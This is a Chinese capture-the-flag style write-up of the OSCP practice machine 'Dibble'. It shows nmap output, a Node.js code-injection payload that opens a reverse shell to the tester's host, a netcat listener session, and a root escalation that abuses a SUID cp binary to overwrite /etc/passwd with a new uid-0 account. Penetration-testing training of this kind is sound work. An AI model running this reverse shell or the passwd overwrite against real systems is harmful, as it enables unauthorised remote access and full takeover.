OSCP靶场--Dibble

0rch1d2024-04-11 19:03

OSCP靶场--Dibble

考点(前端鉴权参数修改+node.js代码注入 + suid cp提权 )

1.nmap扫描

bash 复制代码 
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.110 -sV -sC  -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-09 06:36 EDT
Nmap scan report for 192.168.173.110
Host is up (0.28s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.207
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh     OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey: 
|   256 cd:dc:05:e6:e3:bb:12:33:f7:09:74:50:12:8a:85:64 (ECDSA)
|_  256 a0:90:1f:50:78:b3:9e:41:2a:7f:5c:6f:4d:0e:a1:fa (ED25519)
80/tcp    open  http    Apache httpd 2.4.46 ((Fedora))
|_http-server-header: Apache/2.4.46 (Fedora)
|_http-generator: Drupal 9 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
|_/index.php/comment/reply/
|_http-title: Home | Hacking Articles
3000/tcp  open  http    Node.js (Express middleware)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
27017/tcp open  mongodb MongoDB 4.2.9
|_mongodb-info: ERROR: Script execution failed (use -d to debug)
| mongodb-databases: 
|   ok = 1.0
|   totalSize = 307200.0
|   databases
|     0
|       sizeOnDisk = 131072.0
|       name = account-app
|       empty = false
|     1
|       sizeOnDisk = 40960.0
|       name = admin
|       empty = false
|     2
|       sizeOnDisk = 61440.0
|       name = config
|       empty = false
|     3
|       sizeOnDisk = 73728.0
|       name = local
|_      empty = false
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.87 seconds

2.user priv

bash 复制代码 
## 3000端口是node.js应用:
http://192.168.173.110:3000/


## burp中node.js反弹shell
username=aaa&msg=(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(80, "192.168.45.250", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

###
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 80  
listening on [any] 80 ...
192.168.173.110: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.110] 42158
python -c 'import pty;pty.spawn("/bin/bash")'
[benjamin@dibble app]$ ^Z
zsh: suspended  nc -lvvp 80
                                                                                                                                                           
┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1]  + continued  nc -lvvp 80

[benjamin@dibble app]$ export TERM=xterm
[benjamin@dibble app]$ ls
app.js  node_modules  package-lock.json  routes     utils
bin     package.json  public             server.sh  views
[benjamin@dibble app]$ cd ~
[benjamin@dibble ~]$ ls
app  local.txt
[benjamin@dibble ~]$ cat local.txt
55a058fd5a338eda11819f7a5c161c0b
[benjamin@dibble ~]$

注册一个用户aaa:bbb登陆:

显示只有管理员才能注册事件:

修改前端可控参数UserLevel绕过:



3. root priv

bash 复制代码 
## linpeas枚举:
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid                                                                           
strings Not Found                                                                                                                                          
strace Not Found                                                                                                                                           
-rwsr-xr-x. 1 root root 91K Mar 26  2020 /usr/bin/gpasswd                                                                                                  
-rwsr-xr-x. 1 root root 41K Jan 28  2020 /usr/bin/fusermount
-rwsr-xr-x. 1 root root 156K Apr 23  2020 /usr/bin/cp

####################
## cp suid覆盖/etc/passwd提权:
##
[benjamin@dibble ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:997:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
systemd-timesync:x:998:996:systemd Time Synchronization:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
unbound:x:997:994:Unbound DNS resolver:/etc/unbound:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
chrony:x:996:993::/var/lib/chrony:/sbin/nologin
benjamin:x:1000:1000::/home/benjamin:/bin/bash
mongod:x:995:992:mongod:/var/lib/mongo:/bin/false
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:994:991:Nginx web server:/var/lib/nginx:/sbin/nologin

#####################
## 
┌──(root㉿kali)-[~/Desktop]
└─# openssl passwd pass@123             
$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1

## 写入/tmp/passwd
[benjamin@dibble ~]$ cat /etc/passwd > /tmp/passwd
echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /tmp/passwd

## /usr/bin/cp覆盖/etc/passwd
[benjamin@dibble ~]$ /usr/bin/cp /tmp/passwd /etc/passwd
[benjamin@dibble ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
...
root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash
[benjamin@dibble ~]$ su root
Password: 
su: Authentication failure
[benjamin@dibble ~]$ su root1
Password: 
[root@dibble benjamin]# id
uid=0(root) gid=0(root) groups=0(root)
[root@dibble benjamin]#

4.总结:

bash 复制代码 
##
https://zekosec.com/2023/07/27/pg-writeup-dibble.html

##
https://ljdd520.github.io/2020/03/14/Node-js%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E4%B8%8E%E6%80%BB%E7%BB%93/
##
https://github.com/cyberheartmi9/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
相关推荐
中云DDoS CC防护蔡蔡2 小时前
微信小程序被攻击怎么选择高防产品
服务器·网络安全·微信小程序·小程序·ddos
黑客Ash8 小时前
【D01】网络安全概论
网络·安全·web安全·php
.Ayang10 小时前
SSRF漏洞利用
网络·安全·web安全·网络安全·系统安全·网络攻击模型·安全架构
.Ayang10 小时前
SSRF 漏洞全解析(概述、攻击流程、危害、挖掘与相关函数)
安全·web安全·网络安全·系统安全·网络攻击模型·安全威胁分析·安全架构
网络安全-老纪11 小时前
iOS应用网络安全之HTTPS
web安全·ios·https
Mr.Pascal12 小时前
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
开发语言·安全·web安全·php
风间琉璃""12 小时前
二进制与网络安全的关系
安全·机器学习·网络安全·逆向·二进制
dot.Net安全矩阵13 小时前
.NET 通过模块和驱动收集本地EDR的工具
windows·安全·web安全·.net·交互
Che_Che_13 小时前
Cross-Inlining Binary Function Similarity Detection
人工智能·网络安全·gnn·二进制相似度检测
热门推荐
01(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明02PyTorch机器学习实现液态神经网络03【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总04玄机平台应急响应—webshell查杀05Coze扣子平台完整体验和实践(附国内和国际版对比)06Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO07【目标跟踪】相机运动补偿08Unity中PICO实现 隔空取物 和 接触抓取物体09RAG 实践- Ollama+RagFlow 部署本地知识库10怎样让音频速度变慢?请跟随以下方法进行操作